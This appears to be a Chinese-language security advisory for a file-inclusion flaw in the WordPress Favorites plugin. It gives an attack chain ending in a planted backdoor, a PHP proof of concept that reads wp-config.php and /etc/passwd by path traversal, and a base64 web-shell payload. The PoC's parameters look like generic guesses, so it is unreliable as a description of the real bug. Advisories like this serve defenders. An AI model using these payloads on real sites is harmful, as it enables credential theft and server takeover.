CVE-2025-60202 WordPress Favorites插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60202

漏洞类型

本地文件包含

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Favorites插件 (Kyle Phillips)

漏洞概述

CVE-2025-60202是WordPress平台上一款名为Favorites的插件中存在的高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含（Remote File Inclusion）和本地文件包含（Local File Inclusion）类型的漏洞，由Patchstack团队的安全研究人员（[email protected]）发现并报告。该漏洞影响Kyle Phillips开发的Favorites插件从任意版本到2.3.6的所有版本。攻击者可以利用该漏洞在目标服务器上包含任意本地文件，甚至可能通过PHP协议包装器实现远程代码执行。漏洞的根本原因在于应用程序对用户可控的输入参数缺乏充分的验证和过滤，直接将用户输入作为文件路径传递给include或require等文件包含函数。由于WordPress插件通常以较高的权限运行，攻击者成功利用此漏洞可能导致敏感信息泄露、服务器配置泄露，甚至获得服务器的完全控制权。该漏洞于2025年11月6日公开披露，建议所有使用该插件的用户立即采取相应的安全措施进行修复。

技术细节

该漏洞存在于WordPress Favorites插件的文件处理逻辑中。攻击者可以通过构造特殊的HTTP请求，利用插件中未经安全处理的参数来触发文件包含功能。在PHP应用程序中，当include、require、include_once或require_once等文件包含函数接收到用户可控的输入时，如果缺乏适当的输入验证和路径限制，攻击者就可以利用路径遍历技术（如使用../）来访问服务器上的敏感文件。常见的攻击场景包括：1）通过../遍历读取wp-config.php等配置文件，获取数据库凭证和加密密钥；2）读取/etc/passwd文件获取系统用户信息；3）结合文件上传功能包含恶意PHP文件实现远程代码执行。攻击者还可以尝试使用PHP协议包装器（如php://input、data://等）来执行任意PHP代码。防御此类漏洞的关键措施包括：对所有用户输入进行严格的输入验证、使用白名单机制限制可包含的文件、使用realpath()函数验证文件路径、禁用不必要的PHP协议包装器等。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的WordPress版本和Favorites插件版本

STEP 2

步骤2

漏洞确认：访问目标站点的插件端点，确认Favorites插件版本<=2.3.6

STEP 3

步骤3

构造恶意请求：构建包含路径遍历字符（../）的HTTP请求，尝试访问系统敏感文件

STEP 4

步骤4

敏感文件读取：利用LFI漏洞读取wp-config.php获取数据库凭证和认证密钥

STEP 5

步骤5

权限提升：如果PHP配置允许，尝试使用php://input等协议包装器执行任意代码

STEP 6

步骤6

持久化控制：上传恶意PHP文件并通过LFI包含执行，建立后门获得服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60202 PoC - WordPress Favorites Plugin Local File Inclusion
 * Target: WordPress Favorites Plugin <= 2.3.6
 * Vulnerability: Local File Inclusion via unprotected parameter
 */

// Target URL - Replace with actual target
$target_url = "http://target-site.com/wp-admin/admin-ajax.php";

// Vulnerable parameter - typical LFI patterns
$vulnerable_params = [
    "tab" => "../../../../../../../../etc/passwd",
    "action" => "../../../../../../../../wp-config.php",
    "view" => "../../../../../../windows/win.ini"
];

// Using file_get_contents or curl to exploit
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . "?" . http_build_query($vulnerable_params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);
curl_close($ch);

echo "Response:\n";
echo $response;

// Alternative: Using PHP protocol wrapper for RCE (if enabled)
// $payload = "php://input"; // Or data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
// Include the payload
?>

影响范围

WordPress Favorites插件 <= 2.3.6

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）立即禁用或删除Favorites插件；2）配置Web服务器阻止包含可疑路径遍历字符的请求；3）限制PHP的allow_url_include和allow_url_fopen配置；4）审查插件代码添加输入验证逻辑；5）启用服务器端入侵检测系统监控异常请求；6）定期备份网站数据以便发生安全事件时快速恢复。建议持续关注插件官方安全公告，及时应用官方发布的安全更新。